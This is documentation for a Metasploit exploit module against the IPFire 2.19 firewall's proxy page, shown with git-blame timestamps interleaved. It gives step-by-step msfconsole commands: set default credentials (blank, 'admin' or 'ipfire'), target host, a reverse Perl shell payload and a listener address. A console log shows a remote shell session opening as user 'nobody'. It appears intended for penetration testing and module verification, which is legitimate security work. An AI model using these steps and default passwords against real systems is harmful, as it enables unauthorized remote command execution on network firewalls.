2016-05-30 10:24:17 -04:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core100/ipfire-2.19.x86_64-full-core100.iso)
|
|
|
|
|
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install the firewall
|
|
|
|
|
2. Start msfconsole
|
|
|
|
|
3. Do: ```use exploit/linux/http/ipfire_proxy_exec```
|
2016-05-30 10:25:49 -04:00
|
|
|
4. Do: ```set password admin``` or whatever it was set to at install
|
2016-05-30 10:24:17 -04:00
|
|
|
5. Do: ```set rhost 10.10.10.10```
|
|
|
|
|
6. Do: ```set payload cmd/unix/reverse_perl```
|
|
|
|
|
7. Do: ```set lhost 192.168.2.229```
|
|
|
|
|
8. Do: ```exploit```
|
|
|
|
|
9. You should get a shell.
|
|
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
|
|
|
|
**PASSWORD**
|
|
|
|
|
|
|
|
|
|
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf > use exploit/linux/http/ipfire_proxy_exec
|
|
|
|
|
msf exploit(ipfire_proxy_rce) > set password admin
|
|
|
|
|
password => admin
|
|
|
|
|
msf exploit(ipfire_proxy_rce) > set rhost 192.168.2.201
|
|
|
|
|
rhost => 192.168.2.201
|
|
|
|
|
msf exploit(ipfire_proxy_rce) > set payload cmd/unix/reverse_perl
|
|
|
|
|
payload => cmd/unix/reverse_perl
|
|
|
|
|
msf exploit(ipfire_proxy_rce) > set verbose true
|
|
|
|
|
verbose => true
|
|
|
|
|
msf exploit(ipfire_proxy_rce) > set lhost 192.168.2.229
|
|
|
|
|
lhost => 192.168.2.229
|
|
|
|
|
msf exploit(ipfire_proxy_rce) > exploit
|
|
|
|
|
|
|
|
|
|
[*] Started reverse TCP handler on 192.168.2.229:4444
|
|
|
|
|
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400
|
|
|
|
|
|
|
|
|
|
id
|
|
|
|
|
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
|
|
|
|
|
whoami
|
|
|
|
|
nobody
|
|
|
|
|
```
|
